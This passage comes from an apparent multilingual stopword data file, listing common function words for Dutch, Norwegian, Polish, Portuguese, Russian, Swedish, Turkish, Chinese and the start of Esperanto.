"mw",
"na",
"naar",
"nam",
"namelijk",
"nee",
"neem",
"negen",
"nemen",
"nergens",
"niemand",
"niet",
"niets",
"niks",
"noch",
"nochtans",
"nog",
"nooit",
"nu",
"nv",
"of",
"om",
"omdat",
"ondanks",
"onder",
"ondertussen",
"ons",
"onze",
"onzeker",
"ooit",
"ook",
"op",
"over",
"overal",
"overige",
"paar",
"per",
"recent",
"redelijk",
"samen",
"sinds",
"steeds",
"te",
"tegen",
"tegenover",
"thans",
"tien",
"tiende",
"tijdens",
"tja",
"toch",
"toe",
"tot",
"totdat",
"tussen",
"twee",
"tweede",
"u",
"uit",
"uw",
"vaak",
"van",
"vanaf",
"veel",
"veertig",
"verder",
"verscheidene",
"verschillende",
"via",
"vier",
"vierde",
"vijf",
"vijfde",
"vijftig",
"volgend",
"volgens",
"voor",
"voordat",
"voorts",
"waar",
"waarom",
"waarschijnlijk",
"wanneer",
"waren",
"was",
"wat",
"we",
"wederom",
"weer",
"weinig",
"wel",
"welk",
"welke",
"werd",
"werden",
"werder",
"whatever",
"wie",
"wij",
"wijzelf",
"wil",
"wilden",
"willen",
"word",
"worden",
"wordt",
"zal",
"ze",
"zei",
"zeker",
"zelf",
"zelfde",
"zes",
"zeven",
"zich",
"zij",
"zijn",
"zijzelf",
"zo",
"zoals",
"zodat",
"zou",
"zouden",
"zulk",
"zullen",
],
"no": [
"alle",
"at",
"av",
"bare",
"begge",
"ble",
"blei",
"bli",
"blir",
"blitt",
"både",
"båe",
"da",
"de",
"deg",
"dei",
"deim",
"deira",
"deires",
"dem",
"den",
"denne",
"der",
"dere",
"deres",
"det",
"dette",
"di",
"din",
"disse",
"ditt",
"du",
"dykk",
"dykkar",
"då",
"eg",
"ein",
"eit",
"eitt",
"eller",
"elles",
"en",
"enn",
"er",
"et",
"ett",
"etter",
"for",
"fordi",
"fra",
"før",
"ha",
"hadde",
"han",
"hans",
"har",
"hennar",
"henne",
"hennes",
"her",
"hjå",
"ho",
"hoe",
"honom",
"hoss",
"hossen",
"hun",
"hva",
"hvem",
"hver",
"hvilke",
"hvilken",
"hvis",
"hvor",
"hvordan",
"hvorfor",
"i",
"ikke",
"ikkje",
"ingen",
"ingi",
"inkje",
"inn",
"inni",
"ja",
"jeg",
"kan",
"kom",
"korleis",
"korso",
"kun",
"kunne",
"kva",
"kvar",
"kvarhelst",
"kven",
"kvi",
"kvifor",
"man",
"mange",
"me",
"med",
"medan",
"meg",
"meget",
"mellom",
"men",
"mi",
"min",
"mine",
"mitt",
"mot",
"mykje",
"ned",
"no",
"noe",
"noen",
"noka",
"noko",
"nokon",
"nokor",
"nokre",
"nå",
"når",
"og",
"også",
"om",
"opp",
"oss",
"over",
"på",
"samme",
"seg",
"selv",
"si",
"sia",
"sidan",
"siden",
"sin",
"sine",
"sitt",
"sjøl",
"skal",
"skulle",
"slik",
"so",
"som",
"somme",
"somt",
"så",
"sånn",
"til",
"um",
"upp",
"ut",
"uten",
"var",
"vart",
"varte",
"ved",
"vere",
"verte",
"vi",
"vil",
"ville",
"vore",
"vors",
"vort",
"vår",
"være",
"vært",
"å",
],
"pl": [
"aby",
"ach",
"aj",
"albo",
"ale",
"ani",
"aż",
"bardzo",
"bez",
"bo",
"bowiem",
"by",
"byli",
"bym",
"być",
"był",
"była",
"było",
"były",
"będzie",
"będą",
"chce",
"choć",
"ci",
"ciebie",
"cię",
"co",
"coraz",
"coś",
"czy",
"czyli",
"często",
"daleko",
"dla",
"dlaczego",
"dlatego",
"do",
"dobrze",
"dokąd",
"dość",
"dr",
"dużo",
"dwa",
"dwaj",
"dwie",
"dwoje",
"dzisiaj",
"dziś",
"gdy",
"gdyby",
"gdyż",
"gdzie",
"go",
"godz",
"hab",
"i",
"ich",
"ii",
"iii",
"ile",
"im",
"inne",
"inny",
"inż",
"iv",
"ix",
"iż",
"ja",
"jak",
"jakby",
"jaki",
"jakie",
"jako",
"je",
"jeden",
"jedna",
"jednak",
"jedno",
"jednym",
"jedynie",
"jego",
"jej",
"jemu",
"jest",
"jestem",
"jeszcze",
"jeśli",
"jeżeli",
"już",
"ją",
"każdy",
"kiedy",
"kierunku",
"kilku",
"kto",
"która",
"które",
"którego",
"której",
"który",
"których",
"którym",
"którzy",
"ku",
"lat",
"lecz",
"lub",
"ma",
"mają",
"mam",
"mamy",
"mgr",
"mi",
"miał",
"mimo",
"mnie",
"mną",
"mogą",
"moi",
"moja",
"moje",
"może",
"można",
"mu",
"musi",
"my",
"mój",
"na",
"nad",
"nam",
"nami",
"nas",
"nasi",
"nasz",
"nasza",
"nasze",
"natychmiast",
"nawet",
"nic",
"nich",
"nie",
"niego",
"niej",
"niemu",
"nigdy",
"nim",
"nimi",
"nią",
"niż",
"no",
"nowe",
"np",
"nr",
"o",
"o.o.",
"obok",
"od",
"ok",
"około",
"on",
"ona",
"one",
"oni",
"ono",
"oraz",
"owszem",
"pan",
"pl",
"po",
"pod",
"ponad",
"ponieważ",
"poza",
"prof",
"przed",
"przede",
"przedtem",
"przez",
"przy",
"raz",
"razie",
"roku",
"również",
"sam",
"sama",
"się",
"skąd",
"sobie",
"sposób",
"swoje",
"są",
"ta",
"tak",
"taki",
"takich",
"takie",
"także",
"tam",
"te",
"tego",
"tej",
"tel",
"temu",
"ten",
"teraz",
"też",
"to",
"tobie",
"tobą",
"trzeba",
"tu",
"tutaj",
"twoi",
"twoja",
"twoje",
"twój",
"ty",
"tych",
"tylko",
"tym",
"tys",
"tzw",
"tę",
"u",
"ul",
"vi",
"vii",
"viii",
"vol",
"w",
"wam",
"wami",
"was",
"wasi",
"wasz",
"wasza",
"wasze",
"we",
"wie",
"więc",
"wszystko",
"wtedy",
"www",
"wy",
"właśnie",
"wśród",
"xi",
"xii",
"xiii",
"xiv",
"xv",
"z",
"za",
"zawsze",
"zaś",
"ze",
"zł",
"żaden",
"że",
"żeby",
],
"pt": [
"a",
"acerca",
"adeus",
"agora",
"ainda",
"algmas",
"algo",
"algumas",
"alguns",
"ali",
"além",
"ambos",
"ano",
"anos",
"antes",
"ao",
"aos",
"apenas",
"apoio",
"apontar",
"após",
"aquela",
"aquelas",
"aquele",
"aqueles",
"aqui",
"aquilo",
"as",
"assim",
"através",
"atrás",
"até",
"aí",
"baixo",
"bastante",
"bem",
"bom",
"breve",
"cada",
"caminho",
"catorze",
"cedo",
"cento",
"certamente",
"certeza",
"cima",
"cinco",
"coisa",
"com",
"como",
"comprido",
"conhecido",
"conselho",
"contra",
"corrente",
"custa",
"cá",
"da",
"daquela",
"daquele",
"dar",
"das",
"de",
"debaixo",
"demais",
"dentro",
"depois",
"desde",
"desligado",
"dessa",
"desse",
"desta",
"deste",
"deve",
"devem",
"deverá",
"dez",
"dezanove",
"dezasseis",
"dezassete",
"dezoito",
"dia",
"diante",
"direita",
"diz",
"dizem",
"dizer",
"do",
"dois",
"dos",
"doze",
"duas",
"dá",
"dão",
"dúvida",
"e",
"ela",
"elas",
"ele",
"eles",
"em",
"embora",
"enquanto",
"entre",
"então",
"era",
"essa",
"essas",
"esse",
"esses",
"esta",
"estado",
"estar",
"estará",
"estas",
"estava",
"este",
"estes",
"esteve",
"estive",
"estivemos",
"estiveram",
"estiveste",
"estivestes",
"estou",
"está",
"estás",
"estão",
"eu",
"exemplo",
"falta",
"fará",
"favor",
"faz",
"fazeis",
"fazem",
"fazemos",
"fazer",
"fazes",
"fazia",
"faço",
"fez",
"fim",
"final",
"foi",
"fomos",
"for",
"fora",
"foram",
"forma",
"foste",
"fostes",
"fui",
"geral",
"grande",
"grandes",
"grupo",
"hoje",
"horas",
"há",
"iniciar",
"inicio",
"ir",
"irá",
"isso",
"ista",
"iste",
"isto",
"já",
"lado",
"ligado",
"local",
"logo",
"longe",
"lugar",
"lá",
"maior",
"maioria",
"maiorias",
"mais",
"mal",
"mas",
"me",
"meio",
"menor",
"menos",
"meses",
"mesmo",
"meu",
"meus",
"mil",
"minha",
"minhas",
"momento",
"muito",
"muitos",
"máximo",
"mês",
"na",
"nada",
"naquela",
"naquele",
"nas",
"nem",
"nenhuma",
"nessa",
"nesse",
"nesta",
"neste",
"no",
"noite",
"nome",
"nos",
"nossa",
"nossas",
"nosso",
"nossos",
"nova",
"nove",
"novo",
"novos",
"num",
"numa",
"nunca",
"não",
"nível",
"nós",
"número",
"o",
"obra",
"obrigada",
"obrigado",
"oitava",
"oitavo",
"oito",
"onde",
"ontem",
"onze",
"os",
"ou",
"outra",
"outras",
"outro",
"outros",
"para",
"parece",
"parte",
"partir",
"pegar",
"pela",
"pelas",
"pelo",
"pelos",
"perto",
"pessoas",
"pode",
"podem",
"poder",
"poderá",
"podia",
"ponto",
"pontos",
"por",
"porque",
"porquê",
"posição",
"possivelmente",
"posso",
"possível",
"pouca",
"pouco",
"povo",
"primeira",
"primeiro",
"promeiro",
"próprio",
"próximo",
"puderam",
"pôde",
"põe",
"põem",
"qual",
"qualquer",
"quando",
"quanto",
"quarta",
"quarto",
"quatro",
"que",
"quem",
"quer",
"quero",
"questão",
"quieto",
"quinta",
"quinto",
"quinze",
"quê",
"relação",
"sabe",
"saber",
"se",
"segunda",
"segundo",
"sei",
"seis",
"sem",
"sempre",
"ser",
"seria",
"sete",
"seu",
"seus",
"sexta",
"sexto",
"sim",
"sistema",
"sob",
"sobre",
"sois",
"somente",
"somos",
"sou",
"sua",
"suas",
"são",
"sétima",
"sétimo",
"tal",
"talvez",
"também",
"tanto",
"tarde",
"te",
"tem",
"temos",
"tempo",
"tendes",
"tenho",
"tens",
"tentar",
"tentaram",
"tente",
"tentei",
"ter",
"terceira",
"terceiro",
"teu",
"teus",
"teve",
"tipo",
"tive",
"tivemos",
"tiveram",
"tiveste",
"tivestes",
"toda",
"todas",
"todo",
"todos",
"trabalhar",
"trabalho",
"treze",
"três",
"tu",
"tua",
"tuas",
"tudo",
"tão",
"têm",
"um",
"uma",
"umas",
"uns",
"usa",
"usar",
"vai",
"vais",
"valor",
"veja",
"vem",
"vens",
"ver",
"verdade",
"verdadeiro",
"vez",
"vezes",
"viagem",
"vindo",
"vinte",
"você",
"vocês",
"vos",
"vossa",
"vossas",
"vosso",
"vossos",
"vários",
"vão",
"vêm",
"vós",
"zero",
"à",
"às",
"área",
"é",
"és",
"último",
],
"ru": [
"а",
"алло",
"без",
"белый",
"близко",
"более",
"больше",
"большой",
"будем",
"будет",
"будете",
"будешь",
"будто",
"буду",
"будут",
"будь",
"бы",
"бывает",
"бывь",
"был",
"была",
"были",
"было",
"быть",
"в",
"важная",
"важное",
"важные",
"важный",
"вам",
"вами",
"вас",
"ваш",
"ваша",
"ваше",
"ваши",
"вверх",
"вдали",
"вдруг",
"ведь",
"везде",
"вернуться",
"весь",
"вечер",
"взгляд",
"взять",
"вид",
"видеть",
"вместе",
"вниз",
"внизу",
"во",
"вода",
"война",
"вокруг",
"вон",
"вообще",
"вопрос",
"восемнадцатый",
"восемнадцать",
"восемь",
"восьмой",
"вот",
"впрочем",
"времени",
"время",
"все",
"всегда",
"всего",
"всем",
"всеми",
"всему",
"всех",
"всею",
"всю",
"всюду",
"вся",
"всё",
"второй",
"вы",
"выйти",
"г",
"где",
"главный",
"глаз",
"говорил",
"говорит",
"говорить",
"год",
"года",
"году",
"голова",
"голос",
"город",
"да",
"давать",
"давно",
"даже",
"далекий",
"далеко",
"дальше",
"даром",
"дать",
"два",
"двадцатый",
"двадцать",
"две",
"двенадцатый",
"двенадцать",
"дверь",
"двух",
"девятнадцатый",
"девятнадцать",
"девятый",
"девять",
"действительно",
"дел",
"делать",
"дело",
"день",
"деньги",
"десятый",
"десять",
"для",
"до",
"довольно",
"долго",
"должно",
"должный",
"дом",
"дорога",
"друг",
"другая",
"другие",
"других",
"друго",
"другое",
"другой",
"думать",
"душа",
"е",
"его",
"ее",
"ей",
"ему",
"если",
"есть",
"еще",
"ещё",
"ею",
"её",
"ж",
"ждать",
"же",
"жена",
"женщина",
"жизнь",
"жить",
"за",
"занят",
"занята",
"занято",
"заняты",
"затем",
"зато",
"зачем",
"здесь",
"земля",
"знать",
"значит",
"значить",
"и",
"идти",
"из",
"или",
"им",
"именно",
"иметь",
"ими",
"имя",
"иногда",
"их",
"к",
"каждая",
"каждое",
"каждые",
"каждый",
"кажется",
"казаться",
"как",
"какая",
"какой",
"кем",
"книга",
"когда",
"кого",
"ком",
"комната",
"кому",
"конец",
"конечно",
"которая",
"которого",
"которой",
"которые",
"который",
"которых",
"кроме",
"кругом",
"кто",
"куда",
"лежать",
"лет",
"ли",
"лицо",
"лишь",
"лучше",
"любить",
"люди",
"м",
"маленький",
"мало",
"мать",
"машина",
"между",
"меля",
"менее",
"меньше",
"меня",
"место",
"миллионов",
"мимо",
"минута",
"мир",
"мира",
"мне",
"много",
"многочисленная",
"многочисленное",
"многочисленные",
"многочисленный",
"мной",
"мною",
"мог",
"могут",
"мож",
"может",
"можно",
"можхо",
"мои",
"мой",
"мор",
"москва",
"мочь",
"моя",
"моё",
"мы",
"на",
"наверху",
"над",
"надо",
"назад",
"наиболее",
"найти",
"наконец",
"нам",
"нами",
"народ",
"нас",
"начала",
"начать",
"наш",
"наша",
"наше",
"наши",
"не",
"него",
"недавно",
"недалеко",
"нее",
"ней",
"некоторый",
"нельзя",
"нем",
"немного",
"нему",
"непрерывно",
"нередко",
"несколько",
"нет",
"нею",
"неё",
"ни",
"нибудь",
"ниже",
"низко",
"никакой",
"никогда",
"никто",
"никуда",
"ними",
"них",
"ничего",
"ничто",
"но",
"новый",
"нога",
"ночь",
"ну",
"нужно",
"нужный",
"нх",
"о",
"об",
"оба",
"обычно",
"один",
"одиннадцатый",
"одиннадцать",
"однажды",
"однако",
"одного",
"одной",
"оказаться",
"окно",
"около",
"он",
"она",
"они",
"оно",
"опять",
"особенно",
"остаться",
"от",
"ответить",
"отец",
"отовсюду",
"отсюда",
"очень",
"первый",
"перед",
"писать",
"плечо",
"по",
"под",
"подумать",
"пожалуйста",
"позже",
"пойти",
"пока",
"пол",
"получить",
"помнить",
"понимать",
"понять",
"пор",
"пора",
"после",
"последний",
"посмотреть",
"посреди",
"потом",
"потому",
"почему",
"почти",
"правда",
"прекрасно",
"при",
"про",
"просто",
"против",
"процентов",
"пятнадцатый",
"пятнадцать",
"пятый",
"пять",
"работа",
"работать",
"раз",
"разве",
"рано",
"раньше",
"ребенок",
"решить",
"россия",
"рука",
"русский",
"ряд",
"рядом",
"с",
"сам",
"сама",
"сами",
"самим",
"самими",
"самих",
"само",
"самого",
"самой",
"самом",
"самому",
"саму",
"самый",
"свет",
"свое",
"своего",
"своей",
"свои",
"своих",
"свой",
"свою",
"сделать",
"сеаой",
"себе",
"себя",
"сегодня",
"седьмой",
"сейчас",
"семнадцатый",
"семнадцать",
"семь",
"сидеть",
"сила",
"сих",
"сказал",
"сказала",
"сказать",
"сколько",
"слишком",
"слово",
"случай",
"смотреть",
"сначала",
"снова",
"со",
"собой",
"собою",
"советский",
"совсем",
"спасибо",
"спросить",
"сразу",
"стал",
"старый",
"стать",
"стол",
"сторона",
"стоять",
"страна",
"суть",
"считать",
"т",
"та",
"так",
"такая",
"также",
"таки",
"такие",
"такое",
"такой",
"там",
"твой",
"твоя",
"твоё",
"те",
"тебе",
"тебя",
"тем",
"теми",
"теперь",
"тех",
"то",
"тобой",
"тобою",
"товарищ",
"тогда",
"того",
"тоже",
"только",
"том",
"тому",
"тот",
"тою",
"третий",
"три",
"тринадцатый",
"тринадцать",
"ту",
"туда",
"тут",
"ты",
"тысяч",
"у",
"увидеть",
"уж",
"уже",
"улица",
"уметь",
"утро",
"хороший",
"хорошо",
"хотеть",
"хоть",
"хотя",
"хочешь",
"час",
"часто",
"часть",
"чаще",
"чего",
"человек",
"чем",
"чему",
"через",
"четвертый",
"четыре",
"четырнадцатый",
"четырнадцать",
"что",
"чтоб",
"чтобы",
"чуть",
"шестнадцатый",
"шестнадцать",
"шестой",
"шесть",
"эта",
"эти",
"этим",
"этими",
"этих",
"это",
"этого",
"этой",
"этом",
"этому",
"этот",
"эту",
"я",
],
"sv": [
"aderton",
"adertonde",
"adjö",
"aldrig",
"alla",
"allas",
"allt",
"alltid",
"alltså",
"andra",
"andras",
"annan",
"annat",
"artonde",
"artonn",
"att",
"av",
"bakom",
"bara",
"behöva",
"behövas",
"behövde",
"behövt",
"beslut",
"beslutat",
"beslutit",
"bland",
"blev",
"bli",
"blir",
"blivit",
"bort",
"borta",
"bra",
"bäst",
"bättre",
"båda",
"bådas",
"dag",
"dagar",
"dagarna",
"dagen",
"de",
"del",
"delen",
"dem",
"den",
"denna",
"deras",
"dess",
"dessa",
"det",
"detta",
"dig",
"din",
"dina",
"dit",
"ditt",
"dock",
"du",
"där",
"därför",
"då",
"efter",
"eftersom",
"ej",
"elfte",
"eller",
"elva",
"en",
"enkel",
"enkelt",
"enkla",
"enligt",
"er",
"era",
"ert",
"ett",
"ettusen",
"fanns",
"fem",
"femte",
"femtio",
"femtionde",
"femton",
"femtonde",
"fick",
"fin",
"finnas",
"finns",
"fjorton",
"fjortonde",
"fjärde",
"fler",
"flera",
"flesta",
"fram",
"framför",
"från",
"fyra",
"fyrtio",
"fyrtionde",
"få",
"får",
"fått",
"följande",
"för",
"före",
"förlåt",
"förra",
"första",
"genast",
"genom",
"gick",
"gjorde",
"gjort",
"god",
"goda",
"godare",
"godast",
"gott",
"gälla",
"gäller",
"gällt",
"gärna",
"gå",
"går",
"gått",
"gör",
"göra",
"ha",
"hade",
"haft",
"han",
"hans",
"har",
"heller",
"hellre",
"helst",
"helt",
"henne",
"hennes",
"hit",
"hon",
"honom",
"hundra",
"hundraen",
"hundraett",
"hur",
"här",
"hög",
"höger",
"högre",
"högst",
"i",
"ibland",
"icke",
"idag",
"igen",
"igår",
"imorgon",
"in",
"inför",
"inga",
"ingen",
"ingenting",
"inget",
"innan",
"inne",
"inom",
"inte",
"inuti",
"ja",
"jag",
"ju",
"jämfört",
"kan",
"kanske",
"knappast",
"kom",
"komma",
"kommer",
"kommit",
"kr",
"kunde",
"kunna",
"kunnat",
"kvar",
"legat",
"ligga",
"ligger",
"lika",
"likställd",
"likställda",
"lilla",
"lite",
"liten",
"litet",
"länge",
"längre",
"längst",
"lätt",
"lättare",
"lättast",
"långsam",
"långsammare",
"långsammast",
"långsamt",
"långt",
"man",
"med",
"mellan",
"men",
"mer",
"mera",
"mest",
"mig",
"min",
"mina",
"mindre",
"minst",
"mitt",
"mittemot",
"mot",
"mycket",
"många",
"måste",
"möjlig",
"möjligen",
"möjligt",
"möjligtvis",
"ned",
"nederst",
"nedersta",
"nedre",
"nej",
"ner",
"ni",
"nio",
"nionde",
"nittio",
"nittionde",
"nitton",
"nittonde",
"nog",
"noll",
"nr",
"nu",
"nummer",
"när",
"nästa",
"någon",
"någonting",
"något",
"några",
"nödvändig",
"nödvändiga",
"nödvändigt",
"nödvändigtvis",
"och",
"också",
"ofta",
"oftast",
"olika",
"olikt",
"om",
"oss",
"på",
"rakt",
"redan",
"rätt",
"sade",
"sagt",
"samma",
"sedan",
"senare",
"senast",
"sent",
"sex",
"sextio",
"sextionde",
"sexton",
"sextonde",
"sig",
"sin",
"sina",
"sist",
"sista",
"siste",
"sitt",
"sitta",
"sju",
"sjunde",
"sjuttio",
"sjuttionde",
"sjutton",
"sjuttonde",
"själv",
"sjätte",
"ska",
"skall",
"skulle",
"slutligen",
"små",
"smått",
"snart",
"som",
"stor",
"stora",
"stort",
"större",
"störst",
"säga",
"säger",
"sämre",
"sämst",
"så",
"sådan",
"sådana",
"sådant",
"tack",
"tidig",
"tidigare",
"tidigast",
"tidigt",
"till",
"tills",
"tillsammans",
"tio",
"tionde",
"tjugo",
"tjugoen",
"tjugoett",
"tjugonde",
"tjugotre",
"tjugotvå",
"tjungo",
"tolfte",
"tolv",
"tre",
"tredje",
"trettio",
"trettionde",
"tretton",
"trettonde",
"två",
"tvåhundra",
"under",
"upp",
"ur",
"ursäkt",
"ut",
"utan",
"utanför",
"ute",
"vad",
"var",
"vara",
"varför",
"varifrån",
"varit",
"varje",
"varken",
"vars",
"varsågod",
"vart",
"vem",
"vems",
"verkligen",
"vi",
"vid",
"vidare",
"viktig",
"viktigare",
"viktigast",
"viktigt",
"vilka",
"vilkas",
"vilken",
"vilket",
"vill",
"vänster",
"vänstra",
"värre",
"vår",
"våra",
"vårt",
"än",
"ännu",
"är",
"även",
"åt",
"åtminstone",
"åtta",
"åttio",
"åttionde",
"åttonde",
"över",
"övermorgon",
"överst",
"övre",
],
"tr": [
"acaba",
"acep",
"adeta",
"altmýþ",
"altmış",
"altý",
"altı",
"ama",
"ancak",
"arada",
"artýk",
"aslında",
"aynen",
"ayrıca",
"az",
"bana",
"bari",
"bazen",
"bazý",
"bazı",
"baţka",
"belki",
"ben",
"benden",
"beni",
"benim",
"beri",
"beþ",
"beş",
"beţ",
"bile",
"bin",
"bir",
"biraz",
"biri",
"birkaç",
"birkez",
"birçok",
"birþey",
"birþeyi",
"birşey",
"birşeyi",
"birţey",
"biz",
"bizden",
"bize",
"bizi",
"bizim",
"bu",
"buna",
"bunda",
"bundan",
"bunlar",
"bunları",
"bunların",
"bunu",
"bunun",
"burada",
"böyle",
"böylece",
"bütün",
"da",
"daha",
"dahi",
"dahil",
"daima",
"dair",
"dayanarak",
"de",
"defa",
"deđil",
"değil",
"diye",
"diđer",
"diğer",
"doksan",
"dokuz",
"dolayı",
"dolayısıyla",
"dört",
"edecek",
"eden",
"ederek",
"edilecek",
"ediliyor",
"edilmesi",
"ediyor",
"elli",
"en",
"etmesi",
"etti",
"ettiği",
"ettiğini",
"eđer",
"eğer",
"fakat",
"gibi",
"göre",
"halbuki",
"halen",
"hangi",
"hani",
"hariç",
"hatta",
"hele",
"hem",
"henüz",
"hep",
"hepsi",
"her",
"herhangi",
"herkes",
"herkesin",
"hiç",
"hiçbir",
"iken",
"iki",
"ila",
"ile",
"ilgili",
"ilk",
"illa",
"ise",
"itibaren",
"itibariyle",
"iyi",
"iyice",
"için",
"işte",
"iţte",
"kadar",
"kanýmca",
"karşın",
"katrilyon",
"kendi",
"kendilerine",
"kendini",
"kendisi",
"kendisine",
"kendisini",
"kere",
"kez",
"keţke",
"ki",
"kim",
"kimden",
"kime",
"kimi",
"kimse",
"kýrk",
"kýsaca",
"kırk",
"lakin",
"madem",
"međer",
"milyar",
"milyon",
"mu",
"mü",
"mý",
"mı",
"nasýl",
"nasıl",
"ne",
"neden",
"nedenle",
"nerde",
"nere",
"nerede",
"nereye",
"nitekim",
"niye",
"niçin",
"o",
"olan",
"olarak",
"oldu",
"olduklarını",
"olduğu",
"olduğunu",
"olmadı",
"olmadığı",
"olmak",
"olması",
"olmayan",
"olmaz",
"olsa",
"olsun",
"olup",
"olur",
"olursa",
"oluyor",
"on",
"ona",
"ondan",
"onlar",
"onlardan",
"onlari",
"onlarýn",
"onları",
"onların",
"onu",
"onun",
"otuz",
"oysa",
"pek",
"rağmen",
"sadece",
"sanki",
"sekiz",
"seksen",
"sen",
"senden",
"seni",
"senin",
"siz",
"sizden",
"sizi",
"sizin",
"sonra",
"tarafından",
"trilyon",
"tüm",
"var",
"vardı",
"ve",
"veya",
"veyahut",
"ya",
"yahut",
"yani",
"yapacak",
"yapmak",
"yaptı",
"yaptıkları",
"yaptığı",
"yaptığını",
"yapılan",
"yapılması",
"yapıyor",
"yedi",
"yerine",
"yetmiþ",
"yetmiş",
"yetmiţ",
"yine",
"yirmi",
"yoksa",
"yüz",
"zaten",
"çok",
"çünkü",
"öyle",
"üzere",
"üç",
"þey",
"þeyden",
"þeyi",
"þeyler",
"þu",
"þuna",
"þunda",
"þundan",
"þunu",
"şey",
"şeyden",
"şeyi",
"şeyler",
"şu",
"şuna",
"şunda",
"şundan",
"şunları",
"şunu",
"şöyle",
"ţayet",
"ţimdi",
"ţu",
"ţöyle",
],
"zh": [
"、",
"。",
"〈",
"〉",
"《",
"》",
"一",
"一切",
"一则",
"一方面",
"一旦",
"一来",
"一样",
"一般",
"七",
"万一",
"三",
"上下",
"不仅",
"不但",
"不光",
"不单",
"不只",
"不如",
"不怕",
"不惟",
"不成",
"不拘",
"不比",
"不然",
"不特",
"不独",
"不管",
"不论",
"不过",
"不问",
"与",
"与其",
"与否",
"与此同时",
"且",
"两者",
"个",
"临",
"为",
"为了",
"为什么",
"为何",
"为着",
"乃",
"乃至",
"么",
"之",
"之一",
"之所以",
"之类",
"乌乎",
"乎",
"乘",
"九",
"也",
"也好",
"也罢",
"了",
"二",
"于",
"于是",
"于是乎",
"云云",
"五",
"人家",
"什么",
"什么样",
"从",
"从而",
"他",
"他人",
"他们",
"以",
"以便",
"以免",
"以及",
"以至",
"以至于",
"以致",
"们",
"任",
"任何",
"任凭",
"似的",
"但",
"但是",
"何",
"何况",
"何处",
"何时",
"作为",
"你",
"你们",
"使得",
"例如",
"依",
"依照",
"俺",
"俺们",
"倘",
"倘使",
"倘或",
"倘然",
"倘若",
"借",
"假使",
"假如",
"假若",
"像",
"八",
"六",
"兮",
"关于",
"其",
"其一",
"其中",
"其二",
"其他",
"其余",
"其它",
"其次",
"具体地说",
"具体说来",
"再者",
"再说",
"冒",
"冲",
"况且",
"几",
"几时",
"凭",
"凭借",
"则",
"别",
"别的",
"别说",
"到",
"前后",
"前者",
"加之",
"即",
"即令",
"即使",
"即便",
"即或",
"即若",
"又",
"及",
"及其",
"及至",
"反之",
"反过来",
"反过来说",
"另",
"另一方面",
"另外",
"只是",
"只有",
"只要",
"只限",
"叫",
"叮咚",
"可",
"可以",
"可是",
"可见",
"各",
"各个",
"各位",
"各种",
"各自",
"同",
"同时",
"向",
"向着",
"吓",
"吗",
"否则",
"吧",
"吧哒",
"吱",
"呀",
"呃",
"呕",
"呗",
"呜",
"呜呼",
"呢",
"呵",
"呸",
"呼哧",
"咋",
"和",
"咚",
"咦",
"咱",
"咱们",
"咳",
"哇",
"哈",
"哈哈",
"哉",
"哎",
"哎呀",
"哎哟",
"哗",
"哟",
"哦",
"哩",
"哪",
"哪个",
"哪些",
"哪儿",
"哪天",
"哪年",
"哪怕",
"哪样",
"哪边",
"哪里",
"哼",
"哼唷",
"唉",
"啊",
"啐",
"啥",
"啦",
"啪达",
"喂",
"喏",
"喔唷",
"嗡嗡",
"嗬",
"嗯",
"嗳",
"嘎",
"嘎登",
"嘘",
"嘛",
"嘻",
"嘿",
"四",
"因",
"因为",
"因此",
"因而",
"固然",
"在",
"在下",
"地",
"多",
"多少",
"她",
"她们",
"如",
"如上所述",
"如何",
"如其",
"如果",
"如此",
"如若",
"宁",
"宁可",
"宁愿",
"宁肯",
"它",
"它们",
"对",
"对于",
"将",
"尔后",
"尚且",
"就",
"就是",
"就是说",
"尽",
"尽管",
"岂但",
"己",
"并",
"并且",
"开外",
"开始",
"归",
"当",
"当着",
"彼",
"彼此",
"往",
"待",
"得",
"怎",
"怎么",
"怎么办",
"怎么样",
"怎样",
"总之",
"总的来看",
"总的来说",
"总的说来",
"总而言之",
"恰恰相反",
"您",
"慢说",
"我",
"我们",
"或",
"或是",
"或者",
"所",
"所以",
"打",
"把",
"抑或",
"拿",
"按",
"按照",
"换句话说",
"换言之",
"据",
"接着",
"故",
"故此",
"旁人",
"无宁",
"无论",
"既",
"既是",
"既然",
"时候",
"是",
"是的",
"替",
"有",
"有些",
"有关",
"有的",
"望",
"朝",
"朝着",
"本",
"本着",
"来",
"来着",
"极了",
"果然",
"果真",
"某",
"某个",
"某些",
"根据",
"正如",
"此",
"此外",
"此间",
"毋宁",
"每",
"每当",
"比",
"比如",
"比方",
"沿",
"沿着",
"漫说",
"焉",
"然则",
"然后",
"然而",
"照",
"照着",
"甚么",
"甚而",
"甚至",
"用",
"由",
"由于",
"由此可见",
"的",
"的话",
"相对而言",
"省得",
"着",
"着呢",
"矣",
"离",
"第",
"等",
"等等",
"管",
"紧接着",
"纵",
"纵令",
"纵使",
"纵然",
"经",
"经过",
"结果",
"给",
"继而",
"综上所述",
"罢了",
"者",
"而",
"而且",
"而况",
"而外",
"而已",
"而是",
"而言",
"能",
"腾",
"自",
"自个儿",
"自从",
"自各儿",
"自家",
"自己",
"自身",
"至",
"至于",
"若",
"若是",
"若非",
"莫若",
"虽",
"虽则",
"虽然",
"虽说",
"被",
"要",
"要不",
"要不是",
"要不然",
"要么",
"要是",
"让",
"论",
"设使",
"设若",
"该",
"诸位",
"谁",
"谁知",
"赶",
"起",
"起见",
"趁",
"趁着",
"越是",
"跟",
"较",
"较之",
"边",
"过",
"还是",
"还有",
"这",
"这个",
"这么",
"这么些",
"这么样",
"这么点儿",
"这些",
"这会儿",
"这儿",
"这就是说",
"这时",
"这样",
"这边",
"这里",
"进而",
"连",
"连同",
"通过",
"遵照",
"那",
"那个",
"那么",
"那么些",
"那么样",
"那些",
"那会儿",
"那儿",
"那时",
"那样",
"那边",
"那里",
"鄙人",
"鉴于",
"阿",
"除",
"除了",
"除此之外",
"除非",
"随",
"随着",
"零",
"非但",
"非徒",
"靠",
"顺",
"顺着",
"首先",
"︿",
"!",
"#",
"$",
"%",
"&",
"(",
")",
"*",
"+",
",",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
":",
";",
"<",
">",
"?",
"@",
"[",
"]",
"{",
"|",
"}",
"~",
"¥",
],
"eo": [
"adiaŭ",
"ajn",
"al",
"ankoraŭ",
"antaŭ",
"aŭ",
"bonan",
"bonvole",
"bonvolu",
"bv",
"ci",
"cia",
"cian",
"cin",
"d-ro",
"da",
"de",
"dek",
"deka",
"do",
"doktor'",
"doktoro",
"du",
"dua",
"dum",
"eble",
"ekz",
"ekzemple",
"en",
"estas",
"estis",
"estos",
"estu",
"estus",
"eĉ",
"f-no",
"feliĉan",
"for",
"fraŭlino",
"ha",
